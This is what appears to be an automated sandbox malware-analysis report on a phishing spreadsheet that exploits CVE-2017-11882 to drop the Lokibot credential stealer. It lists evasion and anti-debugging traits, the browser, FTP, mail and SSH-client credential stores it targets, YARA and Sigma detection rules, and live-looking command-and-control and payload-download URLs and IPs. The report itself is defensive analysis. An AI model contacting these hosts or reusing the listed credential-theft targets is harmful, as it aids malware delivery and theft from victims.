Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\mspaint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mspaint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mspaint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mspaint.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Document contains OLE streams with high entropy indicating encrypted embedded contentShow sources
Source: F-A Payment 20-26 force.xlsxStream path 'EncryptedPackage' entropy: 7.99946501923 (max. 8.0)

Malware Analysis System Evasion:

barindex
Contains functionality for execution timing, often used to detect debuggersShow sources
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 3_2_0154278E rdtsc 3_2_0154278E
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE TID: 2216Thread sleep time: -300000s >= -30000sJump to behavior
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE TID: 2216Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exe TID: 2280Thread sleep time: -120000s >= -30000sJump to behavior
Source: C:\Windows\System32\mspaint.exe TID: 2256Thread sleep time: -15960000s >= -30000sJump to behavior
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,3_2_00403D74

Anti Debugging:

barindex
Contains functionality for execution timing, often used to detect debuggersShow sources
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 3_2_0154278E rdtsc 3_2_0154278E
Contains functionality to read the PEBShow sources
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 3_2_0040317B mov eax, dword ptr fs:[00000030h]3_2_0040317B
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 3_2_0154202E mov eax, dword ptr fs:[00000030h]3_2_0154202E
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 3_2_00402B7C GetProcessHeap,RtlAllocateHeap,3_2_00402B7C
Enables debug privilegesShow sources
Source: C:\Users\user\AppData\Roaming\vbc.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\vbc.exe 'C:\Users\user\AppData\Roaming\vbc.exe' Jump to behavior

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)Show sources
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 3_2_0154278E cpuid 3_2_0154278E
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Users\user\AppData\Roaming\vbc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\data.xml VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\477lumc2.default\secmod.db VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\477lumc2.default\cert8.db VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\477lumc2.default\key3.db VolumeInformationJump to behavior
Queries the cryptographic machine GUIDShow sources
Source: C:\Users\user\AppData\Roaming\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information:

barindex
Yara detected LokibotShow sources
Source: Yara matchFile source: 00000003.00000003.1039184291.02160000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.1054527862.00415000.00000002.00020000.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2276, type: MEMORY
Source: Yara matchFile source: 3.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
Source: C:\Users\user\AppData\Roaming\vbc.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeKey opened: HKEY_LOCAL_MACHINE\Software\9bis.com\KiTTY\SessionsJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeKey opened: HKEY_LOCAL_MACHINE\Software\Martin PrikrylJump to behavior
Tries to harvest and steal browser information (history, passwords, etc)Show sources
Source: C:\Users\user\AppData\Roaming\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\477lumc2.default\secmod.dbJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\477lumc2.default\key3.dbJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\477lumc2.default\cert8.dbJump to behavior
Tries to harvest and steal ftp login credentialsShow sources
Source: C:\Users\user\AppData\Roaming\vbc.exeFile opened: HKEY_LOCAL_MACHINE\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
Tries to steal Mail credentials (via file access)Show sources
Source: C:\Users\user\AppData\Roaming\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeKey opened: HKEY_LOCAL_MACHINE\Software\IncrediMail\IdentitiesJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
Tries to steal Mail credentials (via file registry)Show sources
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: PopPassword3_2_0040D069
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: SmtpPassword3_2_0040D069

Malware Configuration

Threatname: Lokibot

{"c2:": "http://cpf-th.com/dark/five/fre.php"}

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Simulations

Behavior and APIs

TimeTypeDescription
13:20:31API Interceptor171x Sleep call for process: EQNEDT32.EXE modified
13:20:38API Interceptor172x Sleep call for process: vbc.exe modified
13:20:38API Interceptor621x Sleep call for process: mspaint.exe modified

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
F-A Payment 20-26 force.xlsx38%VirustotalBrowse
F-A Payment 20-26 force.xlsx24%ReversingLabsWin32.Exploit.CVE-2017-11882

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SQEVR752\regasm[1].exe100%Joe Sandbox ML
C:\Users\user\AppData\Roaming\vbc.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SQEVR752\regasm[1].exe25%VirustotalBrowse

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
3.2.vbc.exe.400000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File

Domains

SourceDetectionScannerLabelLink
cpf-th.com8%VirustotalBrowse
green9wsdyelectronicsandkitchenappliance.duckdns.org4%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://cpf-th.com/dark/five/fre.php12%VirustotalBrowse
http://cpf-th.com/dark/five/fre.php0%Avira URL Cloudsafe
http://www.ibsensoftware.com/1%VirustotalBrowse
http://www.ibsensoftware.com/0%URL Reputationsafe
http://green9wsdyelectronicsandkitchenappliance.duckdns.org/office360/regasm.exe3%VirustotalBrowse
http://green9wsdyelectronicsandkitchenappliance.duckdns.org/office360/regasm.exe0%Avira URL Cloudsafe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000003.1039184291.02160000.00000004.00000001.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
    00000003.00000003.1039184291.02160000.00000004.00000001.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
      00000003.00000003.1039184291.02160000.00000004.00000001.sdmpLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
      • 0x1301f:$des3: 68 03 66 00 00
      • 0x17410:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
      • 0x174dc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
      00000003.00000002.1054527862.00415000.00000002.00020000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        00000003.00000002.1054527862.00415000.00000002.00020000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
          Process Memory Space: vbc.exe PID: 2276JoeSecurity_LokibotYara detected LokibotJoe Security
            Process Memory Space: vbc.exe PID: 2276JoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              3.2.vbc.exe.400000.2.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
                3.2.vbc.exe.400000.2.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
                  3.2.vbc.exe.400000.2.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
                  • 0x12fff:$des3: 68 03 66 00 00
                  • 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
                  • 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
                  3.2.vbc.exe.400000.2.unpackLoki_1Loki Payloadkevoreilly
                  • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
                  • 0x13ffc:$a2: last_compatible_version

                  Sigma Overview


                  System Summary:

                  barindex
                  Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
                  Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\user\AppData\Roaming\vbc.exe' , CommandLine: 'C:\Users\user\AppData\Roaming\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\vbc.exe, NewProcessName: C:\Users\user\AppData\Roaming\vbc.exe, OriginalFileName: C:\Users\user\AppData\Roaming\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1544, ProcessCommandLine: 'C:\Users\user\AppData\Roaming\vbc.exe' , ProcessId: 2276
                  Sigma detected: EQNEDT32.EXE connecting to internetShow sources
                  Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.133.106.239, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1544, Protocol: tcp, SourceIp: 192.168.2.2, SourceIsIpv6: false, SourcePort: 49158
                  Sigma detected: File Dropped By EQNEDT32EXEShow sources
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE, ProcessId: 1544, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SQEVR752\regasm[1].exe

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  185.147.80.213F-A Payment 20-26 force.xlsxGet hashmaliciousBrowse
                  • cpf-th.com/dark/five/fre.php
                  45.143.138.47F-A Payment 20-26 force.xlsxGet hashmaliciousBrowse
                  • cpf-th.com/dark/five/fre.php
                  103.133.106.239F-A Payment 20-26 force.xlsxGet hashmaliciousBrowse
                  • green9wsdyelectronicsandkitchenappliance.duckdns.org/office360/regasm.exe

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  green9wsdyelectronicsandkitchenappliance.duckdns.orgF-A Payment 20-26 force.xlsxGet hashmaliciousBrowse
                  • 103.133.106.239

                  ASN

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  unknownYu4pbQtaWS.docGet hashmaliciousBrowse
                  • 52.114.74.44
                  http://www.is-two.biz/script/ChannelRegister.phpGet hashmaliciousBrowse
                  • 195.22.26.248
                  OGa0dC4QVI.exeGet hashmaliciousBrowse
                  • 198.58.119.85
                  https://nam04.safelinks.protection.outlook.com/?url=https%3A%2F%2Ft.e.vailresorts.com%2Fr%2F%3Fid%3Dh136d0d7a%2C40a0676%2C40a3cb9%26p1%3Ds0na.blob.core.windows.net%252Fbhu%252FXp2.html%2523YnJldHQud29sbGVuQHZ5YWlyZS5jb20%3D&data=02%7C01%7CGMB-GLB-Phishing%40vyaire.com%7C53dd4ab2e44f427fbf0d08d7cbee0d30%7C67cf4ad46a1a4a019dfeaf94c1adbc07%7C0%7C0%7C637202095592205657&sdata=VajxY34sWJ%2FgjNyjauh9wFBU4qqN8XgEXXAl6c9voGM%3D&reserved=0Get hashmaliciousBrowse
                  • 52.239.232.36
                  F-A Payment 20-26 force.xlsxGet hashmaliciousBrowse
                  • 127.0.0.1
                  DOC Q0017 - 3512C.htmlGet hashmaliciousBrowse
                  • 23.253.181.252
                  CCF202018038477.htmlGet hashmaliciousBrowse
                  • 52.87.111.218
                  job_attach_c9v.jsGet hashmaliciousBrowse
                  • 8.209.72.245
                  http://www.is-two.biz/Get hashmaliciousBrowse
                  • 195.22.26.248
                  xYwmyCik8i.docGet hashmaliciousBrowse
                  • 52.114.6.46
                  AML_Presentation_March_2020_pdf.jarGet hashmaliciousBrowse
                  • 79.143.87.146
                  AML_Presentation_March_2020_pdf.jarGet hashmaliciousBrowse
                  • 79.143.87.146
                  DAWOOENC LNG RFQ PACKAGEDOCUMENTS.exeGet hashmaliciousBrowse
                  • 52.213.114.86
                  COVID 19 Relief.docGet hashmaliciousBrowse
                  • 209.141.54.161
                  https://bjru.us17.list-manage.com/track/click?u=05866771f816c6ee662dd8649&id=501ae5cfeb&e=6668efedceGet hashmaliciousBrowse
                  • 13.224.96.50
                  eCzadGXtGI.exeGet hashmaliciousBrowse
                  • 31.44.184.50
                  VOUCHER Kontik.ppamGet hashmaliciousBrowse
                  • 186.243.111.60
                  VOUCHER Kontik.ppamGet hashmaliciousBrowse
                  • 186.243.111.60
                  Christmass.exeGet hashmaliciousBrowse
                  • 192.168.2.232
                  Doc n#U00b058357_202003186781.xlsGet hashmaliciousBrowse
                  • 47.252.85.163
                  unknownYu4pbQtaWS.docGet hashmaliciousBrowse
                  • 52.114.74.44
                  http://www.is-two.biz/script/ChannelRegister.phpGet hashmaliciousBrowse
                  • 195.22.26.248
                  OGa0dC4QVI.exeGet hashmaliciousBrowse
                  • 198.58.119.85
